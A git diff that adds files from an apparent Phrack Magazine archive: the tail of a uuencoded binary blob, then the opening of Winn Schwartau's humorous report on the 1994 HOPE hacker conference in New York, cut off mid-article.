+MD^E=$UJ<'Y2*=*BJ4%!;(*M;VLW-[L\A^*GPCNO&&H2?O#';-L1PI`+Q;V:1>
+M>3U;]W_WS7>^`=&O-.\-6D.HHBW8B3S]G*F3:-Q'L3FM.9-)=A6MJ;LMH"O38
+M&!7S?\2/%7A[7_B:T%]X5N9KKP[<#%S#Y<QF488J8V*\?>[G&:YZU>-!<\G95
+M(Z,+AY8B7)'<AN_B=\$-?N98+SP@!+$"9F?28P4P,G)4YZ5GG3?V=?$L;^3'1
+M#9LI(9E-Q"%(]_NUZ%/%5XI-/]3DG0BFTUJ=1X@^"7PP\6.\Z:;?>&;TG._3O
+MWW0Y]?+;H/9<5#IOPQ^*'A>$V_@_XF66LV7066HC&X?W?+D#C]17G9/QM@<QM
+M@J.,5I>?Z/\`X9^IKBLIK4'S4MC0T[QI\5_`DX&M_"JRO(D?>9-,@(YP!NS&S
+M74'@?PBJFJ?&+PSKUU*VOVOB?2KEVR\,T2R1+[$*8V('O7T-3+*5:-\-/Y?U6
+M_D<4,3.#_>(W_"OCGP%:V\KQ>)[*6Y`_<03VTEG"#ZOA6!Q[DC^=6[2X?4[]?
+MKJRUJQO)Y26(L=0@4Y]R&,IKS*V78BDM8G33Q-.;W.[T70(_$>C?8?$0-TH;)
+M/E2LV\>ARS%Q]>,Y]*Z^."*.!8%11$JA57'``Z"II0<5=[F=65W9;%*X\-Z->
+M=-NFTJR=AT8PKG\\55E\$Z#(.=.B5AT8<&G*C"6Z"-6<=F>%_M->"]+\*^%/K
+MM5C)=;[C>K+)-N50!V';K7F/ASXEZEH_P0T?1=-F\F.6RE@FP,D[YG)QZ94,'
+M,CUKGJ+E5D:P=]SR?6_#=MKMQ'+/+-"Z#:6C4-N7TP?YU+I/@/2[:0LAU5RRB
+M%&Q+&N5(P?\`EF:J-=QCRV!PUO<ZFS^%6A3N!)HM[<!5"@RW+DX]/EVUTC?!H
+MU=.MX)_"WA9IQ,"6>%YIMI`'!^8XZ]ZGVTWI87*NYHZN+S1O#VF:1K&H>'=$H
+MO$>>X>+4OL\9\I_+5"%<$ELQOSC.`/45R-YXOT6W`TS4/B)826J`NJ0M/-`IE
+M]`$0@'\*CV4YZ+^OT+YXQ.9OO&?@G2Y@\6JW=^PS_P`>UJRC\Y-O\JY;4_'FP
+MCR2DV-A>;3WD90?TS6\<)(AUK,RY?&['B.SVXZ;I?\!59_%][(<10VX)_P!E)
+MB?YUM'"I;L3K/H":QXD<AH(ID]TM_P#$5IZ:?&>IL(_M]]&I'3S0OZ9%-JA!%
+M:B7M),V)?A]JSQ^9=7DTC$9)ENR!^F:Q9_!2I*?,U&%3GH&+UDL73CHD;+#RU
+MD!\*Z=;C?+?2-CM'%C^>:W?!=E8PZM&8A<M*L<A0N0`/D;L*RJ8ESC9(T^K.M
+M"NSGKQ+$Z8Y%GBY`^:0R'.<^G2M73+VWA:,PVEI&PQ\WE#-$I5''?J5&G33U8
+M/K_P3\%='\6>';/Q$-7US2-7F4I+<:;?&)6\MC&ORX(P`@''I70)\/?B5H1''
+M]A?%6YN$`^6'5;%)OS?.?TJ86LC&;3;)D\0_'30AB?0?#'B%%'WK2Z,#G_OOE
+M`K)U;]K)_!-Y%8^-_`6L:+/*,J4E296'<@C&?PK92:TN9.G%[&]H/[5GPN\0(
+M[0VL?86/\-Y%L/\`6N]T;QSX4UY`VF:YIMR#C`CN%S^6:KF7VD0X26QM!(I%0
+MR""".H-<QJGPS\.ZA<S77]G68FG<O*YMU+.QZDM]X_G2G2A-695*M.E*\3S+;
+M6?V3O#\VI7-_IOE6LEP29%PSJ<]?O$D=.QKBS^QY>:4+I(KZ.[AF8NO)C>,D^
+MYXQP1['MW'6J7,E8OG3=V>_W&EVE[GS[>-_<CG\ZI2^#;*1LPO)#Z#.X?Y_&%
+MOD<?D&%QOO6Y9=U^JZG=0QM2EIN@@\/ZG9$"TU-@!T&YE'Y<U)/#KTD?EW*6L
+MU]&/X941P?SKRZ>!SK+7_LU7F2Z?\!_HS>57"U_CC9F+>^$-"O21J/@729"?A
+MO-%:^6WYK6'/\)?AXMRLS>%KNVQ_`M[)MSZX;->G1XYS3!QY<32?KJOS3_,YD
+MI950J.\)?U^!FW_P-\`ZA,TT&H^(].G/.\3)(`?Q&?UJJOPG\;Z%E_!OQ:=\0
+M'Y+>^>2(?3!+*?RKZ/+>/,NQS5+$1L_/_/;\CAKY17I>]!DJ>/?V@O!43-K?)
+MA&TUVSCSNGA"F0@=P(23_P".9K#_`.&\K*QG:WU;P5=VQC.UBEX"P/?*,HQ^5
+M=?23P>'JQ<Z$].W]:G%&<XNTT<I\5?VA-#^-OA:ZATC3]1M&TY"TAN@@#;Q@8
+M8VD_W3UKQ_P[^T5?>#O#EIHEGX4\/W+6L7E_:;N)Y'?YW?)&X`??(_"O)]A>C
+M;BWL=7/9:'.:O\;/$.IWDES'::19&0Y*6UF`H/L#G%9__"TO&MT=L&L7*'L+&
+M>-4/_CHS6JH4XD.38-KOC_54\MKW795/=G<?J:KV.A^*;6<3027%I(K%A(+GB
+M:RGN<@YI.="&FA483>Q/<^&M3U.Z:ZU76HIIW^_)+.TCGZD]:Z+PS;:5HMG)C
+M9W$FGSL[[Q<20OYB<=`5SQ]?7M7+6Q,7'E@=%/#RO=C?$NK1ZM$FG75TMQ8PY
+M,IB2.W5&'_`L;NE9*VNAP_<TUG(_YZ2$_IFLE6G&-HZ&RPUWJ+]HLX?]3I=H\
+MF.Y0&G'6YH^$\J(>BKBI;E+=FJHPB02ZS.WWKEN?3_ZU2:?J+F4?OY3_`,"Q[
+M^IH=)V#VE.+T-FYU5'MQ$VH1HH&"-Y8G\JR[77O[*D9H?*GSQEXR1C\:B&'T+
+MLPEB>R*MUKDER"H"J&.<*N,?2M#P;=N^KMR05MY6W$G(^4UNZ2C%F$JLI&"7*
+M>6T=>H"$DTZ"Y**I&6P!@$UM8S['V5\-OVC?"?ASPWI^B:NM]:RVT2I).(-\F
+M;N>2<*2PY)[5Z3I'QA\$ZXRBS\2:<6(X267RF[?PO@URJ36Z*<=3JX-1AFB#[
+MQ2*Z$9!4@@UY?\8OA"WQ/OHKCS[(>5$(D6<N"O))(('N*)MNW**%D]3RJS_9B
+M4O++7K,W$+7-J)E,K031L@0$<D$YQ^%>]W7P2^'&HMYG_"*V%M+_`,]+,M;,!
+M/QC*UK&K)K4<DH[$4_PF%D&?1_&OBW3B%^53?BX1>/256/ZUCOX+^*.BQJNC-
+M_$N*\"C")J6G=O=E8Y_*G'E3V);N59?$?Q^T/&=(\*Z\!_SPN3"3^#[1^M<SM
+MXV_:<^)?@?3#)K/PJ:V8_*MQ]M#0JW;[@;/_`'T*V23VE]Y#BCW9'V].*FCD/
+MY[5YB+)D<%NGI4B$#O3`D6G%<'GIZ46%<SM02SEF^S)9Q7%P1R",!!ZLV./I=
+MU/YD<UK]KHNA0/-/=@3J"3EL1K^!/`_'/UKPLQR/"8E.27++NN_G_5SLH8NI\
+M2TO='C7B;X^W.C7$L6A7I\Q21YF?D_!3P?Q'X5Y=XM^)B>,93+XFTVTU2;H)9
+MI(P6`]O3\,"EDM+%8&'LYR?IT7H=.)A1KKFB<];KH\>AZT^DV1M=\2^8-QYZY
+MXZDX[UPVFP:8MC')+IZ3RLN69V[Y/;Z8KZ:->?*Y7U/-5!<_(^A9CNH(#^XT!
+M^SCQW$8S4IUJZ5?EE6,>BJ!64I2ENSJC0A$@?6)N=]V_TWFJKWT9))<L:<:4<
+MGT&ZM.&Q&;Y3]U":3[7)P`BK_O&M%1MNS-XGLB*6XDW`%DZC.WGO0TS'^)L?6
+M@*T5.*,76DQA8GUX]2:;ST`'X"K2L9MM[A@^E2VLT,);SK4S\?*-^W'Y4WMH1
+M+8CEW2N61!&IZ#.<4FPJ@7H3U)H&*(\+@'YL]:W_``1&$OKUR-^VQF.#]!4S.
+M?NL#GY)U%AY<2MDK\Y(]J+'<50D<`5:5D)O70[.VED\I`9,L%&2:<]RR#YAD4
+M#WK*R'<:OBW4-$B9M+U>ZTR8#*R0SE,'\#4VB_M5_$W0G"_V_P#;8U.-MS&L>
+MF?\`@1&?UK2.'A-:DRJ.)W&@_MQZ];RI_;'AZQND48/D2-$WZ[A^E>D:#^W!J
+MX*O<+J%EJ6GNW7Y5D4?CD?RJ'A9P^'4:JQ>YW>E_M)_#K7(\6_B>T5B/NS!H<
+M\?4L,5UFF>--&UH`Z?JMC=`=/)N%?^1K*[B[-6+]#1%[&PX<#Z&OG+]KGQ2D.
+MUQIFAPR9*`SR`'IV']:TCN@1UGAWXTZG);&>VUC2]5MD`+&[_<F,?[5Q%YD)J
+M;V^6NUTOXQ6S(K:KHNIV0/W98HQ=1,/[VZ$N%'NVVN1TY1VU_/\`K\0.HT'Q!
+MMH'B$%]+U>RN@IPWE3*=I]#CH:W$E#`%2#]*E.X/0F27%,O+MMT=O$^V67/S(
+M#&44=6P?J!]2*K9$K<XSXB_$6P\"V;6EN5,Y&3\W.?<]2:^7_B#\4=1U^63?6
+M<-LR<*#P/>L+<\[=$.YY;>:C<74K8+X'ZU1>YNU'W7P/5:[O9P:LPA4E#8U]/
+M$N9WT#6=R`#RT]O[U<C:7$@M8T#``+Q^9JJ=.*37F-U9<W,A3(YZR-^%)^9^H
+MIK5)+8ARE+<3@?PK1M]Z86%Z<9/'O2<#M2`1S@?B/YTNZF`9`I-PH`-V*-U`2
+M"@^](6P/I18!DMY#;J/,8*?S/Y5O>`]1BNI-8V(WR:;*W('JHHE!\C8N=)V,=
+MB58Q8(\395HR#[,!S_C_`/JI=,",L,9"H&P"<4];#ZFW<RS)&WE<-VXXK`OV/
+MUV7GS#M](VQ13Y?M"G?H8D\-RA+31RCU+`U!TKL5NAS.ZW#.*4-BF(E1R.AZA
+M59@U6]M2##=31D=-KD4.*>XU)K8W-.^*WC32`%LO$VJ0J.BK<-C\JJ:IXZU[O
+M7+TWNI:A+=W!&"\O)-3'#TT[I%^UD;&FRZ9%.MSIVIWVBW*X!D=F*H?:6(;A)
+M]!&?K78:/XX\:Z'&C64L6LMO>5W@#/(RC;@N\)$GKQ(1[BN6<5+XOZ_KS^1:5
+M;6QU&F_M"65Z('\2:*)IEY:XDMXYRG)&%D78T?3_`&C7J'A?XC6<T4$ND>(;]
+M^Q60>8(_MBW2D'I^[GQ.<^B?I7'6HVW_`*_K[C:,K['>Z1\1O$HG%NW]C:H^0
+MW<(MSV-R1_UQD#9^I8"MNR^(;1^==:MX=UFSE'"Q);^>0@'K$74<D]2.,5S>'
+M\G9:_F.Q\X?%7XU^&=7UBY9M%UEV1BK><PA''_`6(KS>Y^(5B'S:^&+#CI]H6
+MEDD_D5%:0P\MV[$W*%S\2M5QBVMM*M!Z16,9_P#0PQK"U+QAK]VP0ZG=`-DE@
+M(FV`_@N!733P\$]=?4EZ(VO">TZ'J[7>\M]G5F#[MS$;L#GBN,@):-=ORY'3_
+M\ZNGO(J:LR8?+@9_.C=BK$)OQWQ32X'O18`WGTHW'VIV$,<\@9[T9Q3`0O@T7
+M;LFBP`6QZT!B3@$TP+$5C=RXV0OCU(P*IW\K60(;&X=!GO1&S=D)Z*YC,S2,B
+M68Y)[UUWPZ^2U\0R>FF,/S9?\*UJZ09C#XC%LIV6T9#Q@D5+#=2((5@_UI90Z
+MO?FI<=31/0[E$+C<RJ">2%'&?:C[,A!Z"N38V(IM.A.2A+8Z9%4+C0+>4$M%%
+M&2?]FM(S:$XW*$WA"WD)\I2O^ZQ_K5&X\(R0_=D/XK71&MW,G270JOX?O(^BD
+MAL>E02:9=Q_>@D_`9K:,TS-TVBO)%)&<,C+[$8I]O:S74@C@A>5ST5%)/Z5H*
+MFD19['I?]M:]?1R-JMCI?B^$+G[05)N=HQR9(RDZC_KIQQTJLJ>#M3M8'@O[Y
+M_P`.2K(VS[1']K@#_+G$D85P.G\#GKS7%MMJNQJ:ZZ!XJO\`#V<FG^,8`F&:'
+M"1+R;'/9A]I3\%7ZU:U?3WDTF-I;)[5XX0K0%&!C(_APY+#\23ZUC4LK6_K^`
+MON-(W.]?X;^+O`WAZPD7Q!J'[Y1)<6$Z,;?'4A58%2<<9Y.?S'.3_&K7]-%S=
+MICVMK-$J>2I6>XB(4J,91)`AZ]=O-<KY7K:QT48N4N4\U^VS7\UQ%.B@,.`/R
+M0Y_^M69&Y,"'OM&:Z8VMH9SBXNS&,^.M$=R8E95&<^N"/R(JFKH49<KN;_AB:
+MX:32=9`54`@7A1QW]:Y.*54BCR0O!ZG%*FK70IRN[BF90>&&/K0),@8Z5I8F#
+MXH-!8B@!`?TI<T`-/5?K2]J`&8;/2G=!R:8"%O0U):W4UF_F0X#=BR@X^F:+2
+M70;#KK4KJZXGN)''H6X_*L6]F\R7:#PO'XU=**6Q%1Z$6S;UR/2NK\#DQZ%X7
+ME8=?LB)^;_\`UJJK\']=R(:2*5GX:OC!NE*0CDX8Y)_`5MZ%HL$-C:WK(C2.;
+M"P;>"1VZ`\?C652HK:&T(6W-A><`>G2GJ%..>G7)KG-0*J<A03@=2:;AAP","
+M4T`H21&!>-MK#(X[4K*#]W>`/6F"$\A%;+R1D'J".:M6^A>>F?(8*?XF4C'^:
+M-/FL-(L0>';#S`%`NV&`8T&!GW/_`.JM$:-+;QL;>T@A&`"L2!>.>3C&3[FI.
+MYG)^\RK<NQJZK\%M*-VHTJYO-"U`MF.,[F3(Y+*C8DXXY0SUS>L>#?%UFSK?(
+M:9%XF\L%G,0DEFV'',FS;..@QY@4>G&:N%53UZG,XM;'+I;:%,%<&^TBXC;&M
+M["S1QM]1M*?DY]S7I>A6K:KX/N-VHC4)S+$B73-(V\<#.9%5CC&.0*5?S0X>K
+M1]'6?P1M=8\$)=7^MWLK-%YL2[^$(Y[^E>!>'/!GA*ZUV[GUCQ!IIN0HQITDI
+MODL"%`&7DVH<XSPQKS,?"JL,_J_Q-'?@)QC7O/8\S\0Z='IWB298Y+(0N6")Y
+M!=1S8Y!'*$CMZUS$H,3R)TVR,!^9KNP]U32EO8SQ;BZK<=B%LTBY8X45T'*=)
+M'X3&W2-<VL"1`N1^)KCEOH((@K-EAV`HIQ;;L3)I"?VO$.`K@?05)%-#<Y\L>
+M@-WXK1P<1*2>A(F#[$<'FEXJ"D'`HP`,Y&:`$)4.O!/!ZTIE(Z8'X4[`1/(#X
+MU:FF4#@`TTA7&&?'<5&]P0/O<?6K426R"2ZP"%QFJZ]:TBK&;=RR%40'(YQG#
+M-=%X6_=^$?$4@."5@3]36=3X?N_,N.YC6^I7D:A3.Y`/1CD?D:O67B"YL(A`G
+M$1T!XW9R/84Y4T]`C)HTX/%ENZXFAD0C^Z0:OP:[83`;9XT/HW'\ZP=*2-5-8
+M,OP21S+E&5AZJ<U,$0Y4`EE'`P>>>W^>U8MM,U2)H(9"X4(RD#&%`Q^)K1MM1
+M)L[6-9M2U.&-6!^13DD^G2HG)K979<(I[Z&A:+;QQ[]/L5C!/^OFX/X`\_AQJ
+M5Z2TAF4"XFDN2!PI(51^`Z_CFHUO=[EZ+8D@4*5$48C"`#'`%687B$O*!@3U*
+M5J>HCZ7U?X7V>H6C1Z=>`V[@9MKU?M,#C.>K?-GW)('I7":Y\.+W3<"ZL+JWI
+MBB;?')"OV^V#G@85AYD8'!^3RP/6L.5P5X;=O\CGOW.;U'P>OB&T22]L++Q%,
+M"`42YA=;A_<DR.LXQTVQW!^E'@CPUX7T+4&TZ^LYOLKR(\=A`SI,H&2S-'.59
+MDVDDXV%S[FM?:J:MV_K^NGH.UF>H:EING>,[!M"\,^/K_1#/`T4E@R(LSQG@<
+MX65/-48&,KBOE?Q#X.N;SXDW6AK+$L@>2(R2/A?DD=<Y/^[48B<:%&4^RN=.\
+M"BYUHKN<3K>G1Z/XD6TCGCFV2,FY#D'@C(K*OQB[F'^UG]!6^&FYTXR:M="Q6
+MD5&JTBH02V*J7VHBV_=Q<M_GK77&/,['#)V.@^&[M=6_B`R2G(L@0/\`@7I7Y
+M%7`Q,U:05IR,Y/W41]*=%*T+AE."*U)6ALK('"LO`84O3MFN;8Z!#)MXSTIAA
+MFSTII"N1M.0W7IQ3&FS5I$W(FN0O\51-='MFK427(89F/M3-Q/6J2L1<;3EX8
+MIB)-YV[>W>NIT']W\/-:DQ]ZZA7]":RJ?#\U^9<=SFP^/:G2,%D/UK0`$HQQW
+M5O3;&YU.<06Z%CWQV%)Z*[!'9Z!\/2S^9<S+"!T)D()_*NGM],TC3RT9GENIU
+M%Z8DW%?;T'XUYU:LYNT4=E."BM2)Y%F8*,P*#@#&6/X]/PQ^-3P6=@)=RIVP"
+M6D!+9_&EJBM#2@TN-E#KC!_V<<5/#I<,>2O+<\9&3^=1S%V)K6*)AY<D4BDY:
+MP2Q%.,(52BRR''3=(?YTT!ZUX%\4:U9VT*:EJ-A:74[;8'L2\<<Q^4D/%(-HA
+MD^9>G7)`QCGTG3O'=[;MLU*R6;!^_;_*P^J,>WU_"N1R]G)I;&&Y<DTCPAXRW
+MN3/Y,2WQ`W2PLUO<X'3)7#D>QX-9&L?#35#;M!;7=AK=GDL;35H%!)_WU4J`4
+M/^N9/O6C4:CYHO46VC.0UCP['IL#6NI6.KZ+`"3MN(A?6#?[1W>8J(/3,?T%1
+M4)-`OVT=?['MM(UC3F+28L7A"R$G)(AN1)#U[AP:F,Y0M&:_R_K^K%1E9WB?<
+M-7Q`U*X3Q%=03:5:6;PR$!(;.VA*^Q:$8/X'%<A/*TDC.P`9CT':N^FM+DREE
+MS:E.^N1:P''WST%8;$LQ).2>M==)65SGF];'8?#5V4:RJG&;(Y_,5R5P,3-1Y
+M'XV)_"B/I2=*U(+]K,1;H,_=.*E><#N36+6ILGH0M<8[XJ)KH#H:I1)<B(W#2
+M=J89&/4FK2L0V-Z4O2F(*.E`"4HXZ=J`%+$UUVGYC^%M\V.&U)!GZ)6579>JM
+M+AN<JN6.`.:Z+2O`^IZZS3PQK';[B#+(VT9!Q]33J5(TU=CA%RT1T5AX(T32*
+MI%;47:Z/38&VJ3^!S700PVT$1CT[2H[:,CASP1_4_I7GU*TZC[(ZX4E$>UL`R
+M1YLOF8ZKG`_Q_/-.C>U(\L!H@O0+C`J4WT*L/<Q$*(Y`3CD`<T^UC9Y.&*XZ0
+MDG&*=[+4+%MG\GF)RQQG(:E35Y5;YD\SCN*2C<=[%F+6XY-O[I5'>K*ZA$[$5
+MHQ#8ZEL?SI\C0[E.;XS>#M>\+QW6H0,D\6H++>:>RAC,&B>,LF>OWE/)R-@Y;
+MS75>#?%S74:GP+XP2XA09_LK4\S(H'92W[R,?0FLZU*<-9K3^M3G4DW[IVMMG
+M\48K0K'XKT*XTO:>;J-?M5IQ_$67YD_$9]Z]"\->*YKW3X[S2-:AOK?')5_/`
+MBW=^<[A]">/2N-IPU1:U.CMO'L292\M\%3AV@<2!.,_,.&!Q@X`/6JU]8^!_-
+M%!ED>.R%Q(F)9(W-M<;1ZLI5\?C6T:T6K3(Y7?0^:/VB-%^$/ARSFMM`CFN-U
+M<D?[\.IR3!#WW[F8?AC-?._FX!R>17=0?,O+H0U8QKZX,\QYRHX%0>G;%>A%7
+M65C!ZL[#X:+AM9SQ_H!Q_P!]+7*W'RR$X'7TK*/QLO[)"V,9'2FULB"19MB!L
+M133,Q[XI6"XS)/>CI3$%%`!1TH`6CI0`4H6@#0TOP[J6K8-G9S2)W?;\H_'I+
+M7<Q^''T[PC::3?2KMN-0+R>6<<!/4CVKEKUHKW5N;TZ;W>Q/9Z5!9[!I5A&AM
+MZ^;R<_\``S_2G:5:W$EJ1).=BS2A$';YSG]2:YW*Z][5G0H\NB-"VB2$8"!6C
+M/<YY_&I?-D,A;?C/'RG%9^I=R1&8[01NQUW`4C%"26<?\"`XH`>UD#M==JX]]
+M<56DMY8Y.9'(/3!!%5%B9-&BA<ERQ]CBK$<4<JY\[!],=*H"/[&Q/RN7P>"I"
+M_P`:;C8P697#8X);M6B%L>+=*DAN);659897BD0Y5T;!4^H/:N]J^AYVQZ'XY
+M0_:"\5>&BD-Y*NK6HP"EQ]\#V?K^>:]&T'XJ>`_$=Y;744ESX6U0N1+<6\WDV
+M-RI_C7AN=OWA7DXC!RIOFI;=4=,)WWW/3[+Q/XTL(EN+.[T?Q;8L-R^9BWN&<
+M7L!(GR,?<BLKQE\8-"ET::S\2>&]:TF>12H66V6:(GV?(S^5<<(^T=X,J3MHS
+MSY?U6[MC>RFT>1XBQVED"'\@3BL>\NMJ$`\MTKV*<3.3LC-IR#+5T&2.M^'3^
+ME)]5YP#8,/\`QY:YZ1%*FL5I-FG0I8P#3:W,Q*.E`@Z4=*`%HQ0`9)-%`"XI8
+M\<+O]U2:!V.A\.^"_P"V''G78B7/W4C9S^>,#\S79:?X4\/:0R)]F-S./XI!.
+MO/Y8P/RKS\1B)WY(:';1H12YI&@T;,VZWMD5<XX&"/PXJIJJ.MSI%O+^\4RR0
+M2?/R>%(YK""L_,TFR^))(R0-NP<$`G^54=+F:.&5,D8N)#GC^]]/>FDK"+-S_
+M=/MVJ5'J#59;K9QY3$=SZ4U$&RU%L$(D52,]3G@#^E3+;(_2<`@YZ\_RHU0RR
+M9;2Y&2CHZ#NO;\Z>MI.TW$08X!P:5T*S+<>E[U8.NT@=#Q^E2VNC06Y65\,/?
+M0?UH4GT'9%F2TMG("R>7@9P^*Y[5]6M+,B&*19YB=JI%\Q)]\5K23D[$R:2/R
+M+KW0"6+6V`1SL)_E61+$\+E)%*,.H(KOISYCAG#E9&>*4'%6R34T?Q9KF@$MD
+MIFKWEGSDB*9E!^HZ'\:Z'4/C9XNU?1I-*U*]BO('&"TD*A_S&*YIX6G.7-:SF
+M+4VE8Y%]0E?/W5^E5\D\YK912);N)TI\?%,$=3X!)BN=01U*DV3'!&.ZD5SU[
+MQ)L)'N<5E'XV:;(K-POUIG2MC-A1TH$&,4=*`#%*!0!-:V5Q>2"*WADF?^ZBT
+MDFNITSX6ZK=();R2&SC/8G?)C_=''YD5A6KQI+7<VI4I5'H;-O\`#_1[`CSG1
+MGN).F)!A3^`YK:L-!$6(+'3HE3/.Y<UP5*\I[Z([(4HPV-&#3;JWN%>16E2)'
+MONA05./53G/TJ5);*SR(H4A!`#!@<Y_/'Z5COL:7)/W3G]TR[,Y&#TK-OD7_@
+M`(2C3U?!5(9&QGIV_K50(D6HHR)'1T+(QX)7I5+2[(2I<8=2?M,BX(.>M4G9_
+M:!:XLVG+YH4DC/;(R?PJ1-&AP$1G=F&0%7/\A3]HT+E0ZXTZ\T2X\N:*2*1=*
+MK;)(RIP1D<'VI(I#."X1E<G^#@?E5735Q&C#<M;*J2N0CCJ>@]C4HU?2K=VVP
+M7"2L"&9849CZ?P_7^50HMO0=TEJ3)J-S+N^RZ/*=O4SD1_IR:BNI+U(6DO;R+
+MVLT`Z0Q9/X$_X5:BD[/45^QST\?]NSB-7=HL_P"LGD/Z+_@*NPW.GZ'&;73K`
+M62ZO<_>*<"NG5KE1&VIQ4N8U+L"RYQ_A4<VFP:G"R,,''!`R0:2ERZHAJ^C.0
+M<U'P[=V`+A?-B'\2CI]169C%=<9J2NCFE%Q=F'2CI5$B=*.E`!TI5^N*!G2>T
+M!E8WMXHX)LWY^A4_TK!N1B8D\5E'XV6_A("<FC&*U,PQBC%`"A33XK>29PD:]
+M,[L<!5&2:-AI&YIW@35[X_-"+=1U\TX/Y=?SKJM'^'FEV:"2_62Z<=BV%'X#9
+M^IK@KXNWNT]SKI8:^LCH;6,&W:+2[1D2/^&%0J@_RJS;:;?W+JES=);@XPF[7
+M+-_+^M<.VLMSK]#<LM"M["3SFQ(%'(*[B?Y_RJ^;6&ZD`M7BCD//^IYQZ=OS`
+M%9.=W<=C2.D*^W*J%/!!SS52\\'64@SM:,$X*H#@5"FXO0;C<SYOAT73-I=%6
+M`<X#K_7_`.M7-:UH=W%XEM+&#+S6]FVYEP/X@,_K732JJ6YE.-K%6;3]7MYFO
+M!AF`'))4D8]>:9X<O[&'49X[S=<1+</OBC?;)TX8#/K^>*VT:T)-R>ZTBUG9>
+MK2[E>V&#F=!&R_D3FJ[ZGH]N2T+?;7G`"I&/,<'/;;QG\<^U1&$Y/W4-M16I#
+M6N-0O+@>3;:)>X0X_P!*81;?PZFH;?2M8=MT]W%:`G`6*,.?S;I^5:)1AH]25
+M+M[%V'0;6XQ+/=2WDBG.V=R1GZ=*T1+:Z:WEI;A.,8A'']*ER<M-BDDM3,U#Z
+MQD8W:UL8S+,<9PW`-5?[/-PR:AK=V7`^["&P/I@5K%<BOU(>IKV=A/J*[;:(`
+M6%IWV)AG]N:UK32K:PA*VT2QL/O-CEOSI.5M"DCS];13&"P4K],FFM:J4'E`H
+M+]:CF$5)2Z2E20<#FJ=UH.GWRN'MUC.<[HP`U:1FXZQ)<5+1G-:SX;?2HA.LW
+MRR0L<+D885DXQ7=3GSQN<DX\KL(%Q28Q^%:$ABCI0(ZCX<%?[<F$BED^QS<9!
+M]JY^[3-TRCU(_6LE\;-/LE?%+MQ6I`H2M/P]X<N/$>H+96LD22$9!D)`_0&HI
+MG-0BY/H5&/,[(]"T[X*V]JOF7]Z;E@`VQ`44#N,]3^E:]EI%IHY,5K;PQ``@Z
+ME%P3CU/?\:\6IBY5[I:(]*G05+5[EW2=-DUI1)'Y<49X4]\^XQ_6M.#P=;&`2
+M,[F5F!YD&1U].E9.7)H:;EL-!80^0(L%!DE>GX"JXG\R42/PZ'<K@9P/3%3JN
+M%C:M--C+1W3;MTK!"=YP<G'W>@JY>:8Z,0\D1A&!L\O)_P"^L^WI67-<NUBM$
+M'>R:/"QPC!FXPO3_`#ZU9MKZ6[C+2A#&5(V[3_CC'M1YA8U--B46J81(U!X\K
+MM=OOTKB&O?L?C_4I\9:*R"+Q_>D_^M6E)[D3Z',ZY\44:Z:T^S22.'PRE51'5
+M]B1DXK.?1;_4IVNE:TL$N'WD0;F)/OG`_2NR%)4DG+J92GSNR+</P_T_R7N)R
+M&DN"G)\PXS]`.*T-)GN-`9K?3I3;IC+*G"G/MTJW5<U8CD4=2U<:C>74D:7#H
+MK(X)P>GZXS21#SXRH[#O_P#6J-$AD<]Q%&LJE&4JI+$'/OQ6`+J;6IVAMI&MU
+MH1P3N)8CG_"M81ZLENVA;C%OIT0BL80LAX,DG))]:W=%\*0PD7%XPN93R`?NV
+DK]*<IN*OU81C<WEB"384D*!G;U%.GA<%2K#!)SG\JQB:`/_9Z
+``
+end
+
diff --git a/phrack46/23.txt b/phrack46/23.txt
new file mode 100644
index 0000000..48ace57
--- /dev/null
+++ b/phrack46/23.txt
@@ -0,0 +1,1417 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 23 of 28
+
+****************************************************************************
+
+                Cyber Christ Bites The Big Apple
+                 HOPE - Hackers On Planet Earth,
+               New York City - August 13-14, 1994
+                     (C) 1994 Winn Schwartau
+                        by Winn Schwartau
+
+(This  is  Part II of the ongoing Cyber Christ series.   Part  I, 
+"Cyber Christ Meets Lady Luck" DefCon II, Las Vegas, July  22-24, 
+1994 is available all over the 'Net.)
+
+Las Vegas is a miserable place, and with a nasty cold no less; it 
+took me three weeks of inhaling salt water and sand at the  beach 
+to  finally dry up the post nasal drip after my jaunt  to  DefCon 
+II.  My ears returned to normal so that I no longer had to answer 
+every  question with an old Jewish man's "Eh?" while fondling  my 
+lobes for better reception.   
+
+New York had to be better.
+
+Emmanuel  Goldstein  -aka Eric Corely - or is it  the  other  way 
+around? is the host of HOPE, Hackers on Planet Earth, a  celebra
+tion of his successfully publishing 2600 - The Hackers  Quarterly  
+for  ten  years without getting jailed, shot or  worse.   For  as 
+Congressman  Ed Markey said to Eric/Emmanuel in  a  Congressional 
+hearing  last  year,  and I paraphrase, 2600 is no  more  than  a 
+handbook  for hacking (comparable obviously to a terrorist  hand
+book for blowing up the World Trade Center) for which Eric/Emman
+uel should be properly vilified, countenanced and then drawn  and 
+quartered on Letterman's Stupid Pet Tricks. 
+
+Ed  and Eric/Emmanuel obviously have little room for  negotiation 
+and  I frankly enjoyed watching their Congressional  movie  where 
+communication  was  at  a virtual standstill:  and  neither  side 
+understood the viewpoints or positions of the other.  
+
+But  Ed is from Baaahhhsten, and Eric/Emmanuel is from New  York, 
+and  HOPE  will take place in the Hotel  Filthadelphia,  straight 
+across the street from Pennsylvania Station in beautiful downtown 
+fast-food-before-they-mug-you  34th  street,  right  around   the 
+corner  from  clean-the-streets-its-Thanksgiving  Herald  Square.  
+Geography notwithstanding, HOPE promised to be a more  iconoclas
+tic gathering than that of DefCon II. 
+
+First  off,  to set the record straight, I am a New  Yorker.   No 
+matter that I escaped in 1981 for the sunny beaches of California 
+for  7  years, and then moved to the Great State of  the  Legally 
+Stupid  for four more (Tennessee); no matter that I now  live  on 
+the Gulf Coast of Florida where the water temperature never  dips 
+below a chilly  98 degrees; I am and always will be a New Yorker.  
+
+It  took me the better part of a decade of living away  from  New 
+York to come to that undeniable and inescapable conclusion:  Once 
+a  New Yorker, always a New Yorker. Not that that makes  my  wife 
+any the happier.
+
+"You  are  so rude.  You love to argue.   Confrontation  is  your 
+middle name."  Yeah, so what's your point?
+
+You  see,  for a true New Yorker these aren't insults to  be  re-
+regurgitated  at the mental moron who attempts to combat us in  a 
+battle  of wits yet enters the ring unarmed; these are mere  tru
+isms  as seen by someone who views the world in black and  white, 
+not black, white and New York.
+
+Case in point.
+
+I  used  to commute into Manhattan from  the  Westchester  County 
+suburb  of Ossining where I lived 47 feet from the walls of  Sing 
+Sing  prison  (no shit!).  Overlooking the wide  expanse  of  the 
+Hudson  River from my aerie several hundred feet above, the  only 
+disquieting aspect of that location were the enormously deafening 
+thunderclaps which resounded a hundred and one times between  the 
+cliffs on either side of the river.  Then there was the occasion
+al escapee-alarm from the prison. .
+
